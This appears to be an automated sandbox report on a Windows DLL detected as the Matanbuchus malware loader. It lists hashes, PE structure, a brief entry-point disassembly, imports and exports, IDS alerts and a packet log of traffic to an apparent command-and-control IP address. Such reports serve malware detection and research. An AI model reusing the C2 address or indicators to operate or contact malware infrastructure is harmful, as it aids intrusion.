                        Category:dropped
                        Size (bytes):281088
                        Entropy (8bit):6.562104950959375
                        Encrypted:false
                        SSDEEP:6144:pVN7/lxioKLkbHwggs6bAVASkqM98IDsCDvhhKgsQb:N/lYjcHDeSkqV8jvhhK9i
                        MD5:04089EB8F941DEE4F0FBBFEC314718D8
                        SHA1:CE07C536F70AF194A363F2C1A81D99680562C4A2
                        SHA-256:96678CACC0550C86D40B54672C15D1D3E35743FDDF3C2235C21FF636D4A8961D
                        SHA-512:B51B8E8E82BC1D9A1D8A0E5C86937B375544EE5A0CC4BEE8045D3504EE226E36F038461D3ED69EE9B92FCAF3121623A85D0206D596056AE8AD21EECB55EE3788
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\user-PC\user-PC.winmd, Author: Joe Security
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 11%
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.469388129310207
                        Encrypted:false
                        SSDEEP:6144:WzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNFjDH5S:4ZHtYZWOKnMM6bFpHj4
                        MD5:C3E56178D8EC7EDACB8CB1E58BDE3B51
                        SHA1:218F4879EB1741319ED8186AB36BEC16D244EE8F
                        SHA-256:17478373B9EBC2E122F9E26CDA7746101FDF151119A3E75520903DD47EDB6F07
                        SHA-512:6317DD7BF0534CA0CBB8BDAF8693ABE559BCC99E8A8C6AC89D0A87BE6B61C96C08D9055A0C5B014BD388E8E23689D8BE72C93B921CB26DEE7D33B2D78A4EEE53
                        Malicious:false
                        File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Entropy (8bit):6.562104950959375
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.dll
                        File size:281'088 bytes
                        MD5:04089eb8f941dee4f0fbbfec314718d8
                        SHA1:ce07c536f70af194a363f2c1a81d99680562c4a2
                        SHA256:96678cacc0550c86d40b54672c15d1d3e35743fddf3c2235c21ff636d4a8961d
                        SHA512:b51b8e8e82bc1d9a1d8a0e5c86937b375544ee5a0cc4bee8045d3504ee226e36f038461d3ed69ee9b92fcaf3121623a85d0206d596056ae8ad21eecb55ee3788
                        SSDEEP:6144:pVN7/lxioKLkbHwggs6bAVASkqM98IDsCDvhhKgsQb:N/lYjcHDeSkqV8jvhhK9i
                        TLSH:6E546B15F712E660E4AB0178BE14EBF9555D35300784E883B7C22FEA2A356E2DA35F07
                        Icon Hash:7ae282899bbab082
                        Entrypoint:0x1002737b
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                        DLL Characteristics:DYNAMIC_BASE
                        Time Stamp:0x67812600 [Fri Jan 10 13:52:00 2025 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:91719dd2e867694a7eb88b493c8c3318
                        Instruction
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007F3EA931DBB7h
                        call 00007F3EA931DF61h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007F3EA931DA63h
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        push ebp
                        mov ebp, esp
                        and dword ptr [104A9730h], 00000000h
                        sub esp, 24h
                        or dword ptr [10041310h], 01h
                        push 0000000Ah
                        call dword ptr [100330D4h]
                        test eax, eax
                        je 00007F3EA931DD62h
                        and dword ptr [ebp-10h], 00000000h
                        xor eax, eax
                        push ebx
                        push esi
                        push edi
                        xor ecx, ecx
                        lea edi, dword ptr [ebp-24h]
                        push ebx
                        cpuid
                        mov esi, ebx
                        pop ebx
                        nop
                        mov dword ptr [edi], eax
                        mov dword ptr [edi+04h], esi
                        mov dword ptr [edi+08h], ecx
                        xor ecx, ecx
                        mov dword ptr [edi+0Ch], edx
                        mov eax, dword ptr [ebp-24h]
                        mov edi, dword ptr [ebp-20h]
                        mov dword ptr [ebp-0Ch], eax
                        xor edi, 756E6547h
                        mov eax, dword ptr [ebp-18h]
                        xor eax, 49656E69h
                        mov dword ptr [ebp-04h], eax
                        mov eax, dword ptr [ebp-1Ch]
                        xor eax, 6C65746Eh
                        mov dword ptr [ebp-08h], eax
                        xor eax, eax
                        inc eax
                        push ebx
                        cpuid
                        mov esi, ebx
                        pop ebx
                        nop
                        lea ebx, dword ptr [ebp-24h]
                        mov dword ptr [ebx], eax
                        mov eax, dword ptr [ebp-04h]
                        or eax, dword ptr [ebp-08h]
                        or eax, edi
                        mov dword ptr [ebx+04h], esi
                        mov dword ptr [ebx+08h], ecx
                        mov dword ptr [ebx+0Ch], edx
                        jne 00007F3EA931DBF5h
                        mov eax, dword ptr [ebp-24h]
                        and eax, 0FFF3FF0h
                        cmp eax, 000106C0h
                        je 00007F3EA931DBD5h
                        cmp eax, 00020660h
                        je 00007F3EA931DBCEh
                        cmp eax, 00000070h
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3fcf0 | 0xec | .rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3fddc | 0x78 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4ab000 | 0x4318 | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x382a0 | 0x1c | .rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x381e0 | 0x40 | .rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x1b8 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x31b40 | 0x31c00 | 98eacf2076ff62377b072f79e5491ae5 | False | 0.5310929648241206 | data | 6.495193740048111 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata | 0x33000 | 0xd7f0 | 0xd800 | d4e8e65351228824418cd80083859772 | False | 0.42142288773148145 | data | 5.3712295764803075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0x41000 | 0x46912c | 0xe00 | 7f2acf9b01029bc9db39d40e357f0a8f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .reloc | 0x4ab000 | 0x4318 | 0x4400 | dc56ec38e035c518e59ece279778da11 | False | 0.7805032169117647 | data | 6.78967998327928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        DLL | Import
                        KERNEL32.dll | GetCurrentDirectoryA, CreateDirectoryW, FindFirstFileW, GetDriveTypeA, GetFileAttributesA, GetFileType, GetFullPathNameW, GetFullPathNameA, GetTempFileNameW, SetFileAttributesW, GetTempPathW, GetTempPathA, GetTempFileNameA, GetLastError, SetLastError, HeapAlloc, HeapReAlloc, GetProcessHeap, TlsSetValue, FlushInstructionCache, OpenProcess, GetSystemDirectoryA, GetSystemDirectoryW, GetWindowsDirectoryA, GetWindowsDirectoryW, GetEnvironmentVariableW, GetModuleHandleA, GetProcAddress, LoadLibraryExA, LoadLibraryA, LoadLibraryW, SetHandleCount, lstrlenA, lstrlenW, IsValidCodePage, GetACP, GetCPInfo, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, GetModuleFileNameA, GetEnvironmentVariableA, HeapSize, GetStringTypeW, GetStdHandle, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, GetOEMCP, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, DecodePointer
                        USER32.dll | OpenClipboard, GetCaretBlinkTime, GetCursorPos, GetDoubleClickTime, CreatePopupMenu, GetWindowTextLengthA, IsIconic, ShowWindow, IsWindow
                        ADVAPI32.dll | GetUserNameA
                        ole32.dll | CoCreateInstance
                        SHLWAPI.dll | StrCmpIW
                        Name | Ordinal | Address
                        DllInstall | 1 | 0x10019c90
                        Export | 2 | 0x1001bb10
                        Main | 3 | 0x1001bb60
                        UnregisterDll | 4 | 0x1001bb80
                        curl_easy_cleanup | 5 | 0x1001bc40
                        curl_easy_init | 6 | 0x1001bc50
                        curl_easy_perform | 7 | 0x1001c340
                        curl_easy_setopt | 8 | 0x1001c340
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2025-01-16T06:02:00.600788+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49710 | 94.159.113.213 | 443 | TCP
                        2025-01-16T06:02:00.664846+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49709 | 94.159.113.213 | 443 | TCP
                        2025-01-16T06:02:02.561415+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49712 | 94.159.113.213 | 443 | TCP
                        2025-01-16T06:02:03.975767+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49713 | 94.159.113.213 | 443 | TCP
                        2025-01-16T06:02:04.291204+0100 | 2034468 | ET MALWARE Matanbuchus Loader CnC M3 | 1 | 192.168.2.6 | 49714 | 94.159.113.213 | 443 | TCP
                        2025-01-16T06:02:08.504894+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49733 | 94.159.113.213 | 443 | TCP
                        2025-01-16T06:03:03.710922+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 64426 | 94.159.113.213 | 443 | TCP
                        2025-01-16T06:04:03.721325+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 64474 | 94.159.113.213 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jan 16, 2025 06:02:01.566242933 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.566268921 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.566838026 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.566860914 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.566903114 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.566920996 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.566946030 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.566971064 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.567365885 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.567379951 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.567451954 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.567464113 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.567517042 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.567953110 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.567967892 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.568036079 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.568047047 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.568108082 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.568610907 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.568625927 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.568696022 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.568706989 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.568780899 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.568962097 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.568977118 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.569025040 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.569036961 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.569062948 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.569087982 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.613795996 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.613811970 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.613873959 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.613944054 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.613982916 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.614006042 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.614253998 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.614265919 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.614322901 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.614337921 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.614389896 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.652810097 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.652825117 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.653013945 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.653075933 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.653132915 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.653315067 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.653356075 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.653369904 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:01.653387070 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:01.653414011 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.127146006 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.127218962 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.128721952 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.128740072 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.131927967 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.131938934 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.527288914 CET49710443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.527337074 CET4434971094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.561419964 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.561455011 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.561491966 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.561527014 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.561575890 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.561577082 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.723766088 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.723828077 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.723875046 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.723897934 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.723928928 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.724227905 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.725522995 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.725573063 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.725620985 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.725632906 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.725667000 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.725692987 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.763566017 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.763643980 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.764189959 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.816082001 CET49713443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.816097021 CET4434971394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.849309921 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.849359035 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.849421978 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.849484921 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.849522114 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.850843906 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.850893974 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.850922108 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.850939989 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.850986958 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.851068974 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.852619886 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.852665901 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.852711916 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.852726936 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.852767944 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.852854013 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.975018024 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.975044966 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.975143909 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.975163937 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.975227118 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.975678921 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.975697994 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.975805044 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.975817919 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.976022959 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.976547956 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.976569891 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.976655006 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.976671934 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.976696968 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.976758003 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.977565050 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.977586031 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.977663040 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.977663040 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:02.977679014 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:02.977818012 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.066195011 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.066226959 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.066327095 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.066327095 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.066371918 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.067161083 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.099685907 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.099726915 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.100016117 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.100016117 CET49714443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.100054979 CET4434971494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.100959063 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.101016998 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.101063967 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.101083040 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.101113081 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.101314068 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.101362944 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.101362944 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.101392984 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.101412058 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.101454973 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.101454973 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.102159977 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.102204084 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.102256060 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.102267981 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.102313042 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.102385044 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.102543116 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.102583885 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.102632046 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.102643013 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.102683067 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.102950096 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.106862068 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.106903076 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.106950998 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.106961966 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.107002974 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.107002974 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.190679073 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.190732002 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.190798044 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.190867901 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.190922022 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.190922022 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.227061987 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.227117062 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.227278948 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.227278948 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.227346897 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.227495909 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.227611065 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.227654934 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.227705002 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.227720976 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.227761984 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.227803946 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.228292942 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.228336096 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.228383064 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.228394032 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.228429079 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.228596926 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.228714943 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.228760958 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.228810072 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.228821039 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.228863955 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.228945017 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.229355097 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.229394913 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.229439974 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.229450941 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.229482889 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.229501963 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.229873896 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.229913950 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.229962111 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.229973078 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.230026007 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.230072021 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.230412006 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.230457067 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.230501890 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.230513096 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.230560064 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.230729103 CET49712443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:03.230845928 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.230889082 CET4434971294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:03.230932951 CET49712443192.168.2.694.159.113.213
